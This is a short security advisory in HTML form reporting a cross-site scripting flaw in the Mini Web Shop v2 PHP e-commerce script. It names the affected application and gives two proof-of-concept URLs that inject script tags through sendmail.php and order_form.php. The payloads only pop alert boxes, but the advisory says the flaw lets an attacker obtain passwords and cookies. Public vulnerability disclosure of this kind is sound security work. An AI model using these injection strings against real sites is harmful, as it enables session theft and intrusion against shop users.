<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7652.5">
<TITLE>Mini Web Shop v.2 vulnerable to XSS</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
Mini Web Shop V.2<BR>
<BR>
Author: CorryL [corryl80@gmail.com] <BR>
-=[-----------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application: Mini Web Shop<BR>
-=[+] Version: 2<BR>
-=[+] Vendor's URL: <A HREF="http://obiewebsite.sourceforge.net/o.php?Mini_Web_Shop">http://obiewebsite.sourceforge.net/o.php?Mini_Web_Shop</A><BR>
-=[+] Platform: Windows\Linux\Unix<BR>
-=[+] Bug type: Cross-Site Script<BR>
-=[+] Exploitation: Remote<BR>
-=[-]<BR>
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference: <A HREF="http://corryl.altervista.org">http://corryl.altervista.org</A><BR>
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck <BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
An e-commerce PHP script has an online web shop,<BR>
shopping cart (based on cookies),<BR>
one-level categories, multi languages supports, voting and searching...<BR>
Fully functions admin control panel. Each item has thumbnail photo, voting,<BR>
click and qualtity tracker, active or inactive mode, ....<BR>
Users can shopping on Web then order via email then purchasing in cash/cheque or Credit Card.<BR>
Fully admin control panel with items management, new item adding, news publishing, file editor,<BR>
and online configuation tool, you dont have to change your config via FTP.<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
This software is affection from a bug type cross site script ,<BR>
a remote attaker is able to exploit this bug to draw information password,<BR>
cookie, etc.<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF="http://remote-server/path/modules/sendmail.php/">http://remote-server/path/modules/sendmail.php/</A>>"><ScRiPt>alert(100438267)</ScRiPt><BR>
<A HREF="http://remote-server/path/modules/order_form.php/">http://remote-server/path/modules/order_form.php/</A>>"><ScRiPt>alert(1979336232)</ScRiPt><BR>
<BR>
<BR>
</FONT>
</P>
</BODY>
</HTML>